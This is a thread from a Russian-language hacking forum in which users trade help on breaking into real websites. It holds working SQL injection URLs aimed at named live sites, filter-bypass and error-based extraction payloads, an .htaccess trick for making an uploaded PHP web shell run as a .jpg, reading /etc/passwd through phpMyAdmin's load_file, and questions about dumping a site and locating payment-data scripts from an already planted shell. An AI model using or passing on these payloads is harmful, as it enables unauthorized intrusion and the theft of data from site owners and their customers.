Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. smirk

    smirk Elder - Старейшина

    Joined:
    8 Sep 2011
    Messages:
    137
    Likes Received:
    43
    Reputations:
    26
    http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.`tables`+--+
    как тут обойти фильтрацию юниона?

    З.Ы. разобрался, короче это из-за разных кодировок..

    convert(table_name+using+нужная кодировка)
    ток в моем случаи хз как узнать нужную...
     
    #20201 smirk, 20 Apr 2012
    Last edited: 20 Apr 2012
  2. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108


    Там union не фильтруется. нет правна просмотр schema.tables.

    http://www.cinemaphotos.net/cinemaphotos.php?gid=1446+/*!and*/+1/*!=*/2+uNiOn+/*!select*/+1,unhex(hex(table_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+column_name+like+0x25696425--+
     
    2 people like this.
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопрос, заливаю в админке через загрузчик изображений шелл, заливается нормально, только при открытии его
    http://сайт.ру/userfiles/image/222_20110623183746.php
    открывается его исходный код, что можно тут пидумать? поможел ли заливка .htaccess?
    если да то с каким содержимым?
     
  4. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    329
    Likes Received:
    46
    Reputations:
    11
    попробуй с таким содержимым
    Code:
    AddType application/x-httpd-php .jpg 
    AddHandler application/x-httpd-php .jpg
     
    2 people like this.
  5. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    пишу сканер SQLi
    подскажите наиболее часто встречающиеся параметры на страницах

    мой список:
    Code:
    id
    page
    num
    name
    p
    n
    нужно найти еще парочку популярных
     
  6. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    363
    Likes Received:
    189
    Reputations:
    92
    Самый оптимальный вариант - сканер, который сам ищет на ресурсе параметры.

    ...результаты по запросу (inurl:"php?параметр=1"):

    c - 31 900 000
    cat - 21 300 000
    category - 7 560 000
    CatID - 4 850 000
    pagina - 3 660 000
    PID - 2 180 000
    sn - 116 000
    catalogid - 12 600
     
    1 person likes this.
  7. \/ITA

    \/ITA Member

    Joined:
    21 Sep 2011
    Messages:
    25
    Likes Received:
    28
    Reputations:
    8
    спасибо за подсказку ;)

    нашел скулю в POST на одном сайте подставил site.ru?id=1"
    выдает мне такое:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=1[COLOR=Red]"[/COLOR]"' at line 3 SQL query : 
                INSERT INTO
                    ips(ip, cnt, last_url)
               VALUES("***.93.28.***", 1,"/?id=1[COLOR=Red]"[/COLOR]")
                    ON DUPLICATE KEY UPDATE cnt=cnt+1, last_url="/?id=1[COLOR=Red]"[/COLOR]"
    
    я еще не пробовал инжектить в Insert или Update
    где можно почитать посмотреть как это делается?
     
    1 person likes this.
  8. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    313
    Likes Received:
    63
    Reputations:
    66
    Сканеры - гавно, лучше руками искать.
     
  9. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    Есть сайт,на нём у меня шелл,права www-data , прав на запись нет, вопрос, как можно сделать дамп сайта?

    хееелп ми
     
  10. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    ,(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
     
  11. asiaman

    asiaman New Member

    Joined:
    4 Aug 2011
    Messages:
    27
    Likes Received:
    2
    Reputations:
    0
    Code:
    1'and(1)=(select*from(select*from(information_schema.tables`a`)JOIN(information_schema.tables`b`)using(TABLE_CATALOG,TABLE_SCHEMA))c)='1
    1060: Duplicate column name 'Table_Name'

    Здесь понятно. Спасибо. Мы просто делаем листинг таблиц и столбцов.

    Собственно вопрос. Нашли таблицу, вывели все имена столбцов. Можно ли использовать этот шаблон с join + using/on для вывода через ошибку дубля (как выше) записей из таблиц?
    При условии, что пробелы запрещены, limit, order, соответственно, запрещены. А name_const будет работать только на вывод version() (из-за баги - другое не выводит). ExtractValue - в этой ветке 5.0.x отсутствует.

    Или какие еще есть варианты по выводу в таком случае?

    Здесь http://www.xakep.ru/post/50554/?print=true и здесь http://forum.antichat.ru/threadnav119047-1-10.html ответов, к сожалению, не нашел :confused:
    ______________________________________________________

    Еще вопрос. Вот http://www.efanli.com.cn/article_list.php?cid=1 блинд, как я понимаю, там запрет на обращение к схеме. Через блинд можно вывести пути, юзера, базу и др. НО, как подобраться к таблицам и соответственно, к записям таблиц?
     
    #20211 asiaman, 21 Apr 2012
    Last edited: 21 Apr 2012
  12. Darkee

    Darkee New Member

    Joined:
    18 Apr 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь,как можно найти уязвимость в таком типе http://reg.piratua.ru/ ?
     
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    такой вопрос, получил доступ в phpmyadmin
    хотел скачать
    etc/passwd
    ввожу запрос
    SELECT load_file( '/etc/passwd' )
    нормально выдало
    load_file('/etc/passwd')
    [BLOB - 1.2 КБ]

    но содержимое показывать нехочет, чтобы в параметрах невыставил нифига не катит,
    ни Показать BLOB содержимое ни Развернутое отображение данных, в первы раз такое, как всётаки можно попробовать посмотреть содержимаее файла etc/passwd в таком случае?
     
  14. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Показ в HEX отключи или в таблицу заноси.
     
    1 person likes this.
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Когда делаешь запрос над результатами будет Options. Клацаешь и галочку на show blob content
     
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    чтобы в параметрах невыставил нифига не катит,
    ни Показать BLOB содержимое ни Развернутое отображение данных
     
  17. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    не, никакие насройки в параметрах некатят, а как мне занесли данные в таблицу?
    попробовал так
    PHP:
    insert into `db.a` (`text`) VALUES ('(select load_file('/etc/passwd'))')
    выдпло ошибку, как правельние?
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    убери кавычки, у тебя стринг получается, а не выполняющаяся функция

    ((select load_file('/etc/passwd'))
     
    _________________________
    #20218 Konqi, 21 Apr 2012
    Last edited: 21 Apr 2012
    4 people like this.
  19. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    нет походу просто я неправильно пользуюсь тем примером.Вот я а локалхосте пробую пользоваться,и ввожу как в том примере
    http://localhost/erase.php?id=-2+union+select+0x2D3220756E696F6E2073656C6563742027393939272C3131312F2A,2,3/* поидее как там пишется должно вывести 2:3
    999:111 но выводит -2 union select '999',111/* вот такие дела :(
     
  20. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Ни как не могу разобраться с rewrite mode. Залил шелл на сайт. При обращении на /store/checkout/payment_info/xxxxxxxx, где xxxxxxxx уникальный ID, выводится определенная инфа. Все перекопал, но не могу найти тот скрипт на шелле, который обрабатывает ID и выводит инфу. Сервак очень большой, с реврайтом очень плохо знаком. Как можно узнать?
     
Thread Status:
Not open for further replies.